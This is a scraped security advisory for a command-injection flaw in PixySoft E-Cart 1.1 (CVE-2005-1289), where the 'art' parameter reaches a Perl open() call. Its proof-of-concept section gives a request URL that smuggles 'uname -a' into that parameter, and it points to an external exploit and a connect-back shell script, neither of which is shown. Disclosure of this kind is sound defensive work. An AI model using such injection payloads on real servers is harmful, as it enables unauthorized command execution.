PixySoft E-Cart Art Parameter Remote Command Execution Vulnerability
BID:13321
Info
PixySoft E-Cart Art Parameter Remote Command Execution Vulnerability
| Bugtraq ID: | 13321 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1289 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 22 2005 12:00AM |
| Updated: | Jul 12 2009 02:06PM |
| Credit: | Discovery is credited to Inaki Cormenzana. |
| Vulnerable: |
PixySoft E-Cart 1.1 |
| Not Vulnerable: | |
Discussion
PixySoft E-Cart Art Parameter Remote Command Execution Vulnerability
PixySoft E-Cart is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
Specifically, the user-specified 'art' URI parameter is supplied to a Perl open() routine.
PixySoft E-Cart versions 1.1 is reported vulnerable to this issue.
PixySoft E-Cart is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
Specifically, the user-specified 'art' URI parameter is supplied to a Perl open() routine.
PixySoft E-Cart versions 1.1 is reported vulnerable to this issue.
Exploit / POC
PixySoft E-Cart Art Parameter Remote Command Execution Vulnerability
An exploit is not required.
The following proof of concept is available:
http://www.example.com/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
SoulBlack has provided the following exploit:
http://www.soulblack.com.ar/repo/tools/ecart-xpl.php
The following script has been provided that supplies a connect back shell:
An exploit is not required.
The following proof of concept is available:
http://www.example.com/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
SoulBlack has provided the following exploit:
http://www.soulblack.com.ar/repo/tools/ecart-xpl.php
The following script has been provided that supplies a connect back shell:
Solution / Fix
PixySoft E-Cart Art Parameter Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PixySoft E-Cart Art Parameter Remote Command Execution Vulnerability
References:
References:
- E-Cart Homepage (PixySoft)
- E-Cart v1.1 Remote Command Execution (Nicolas Montoza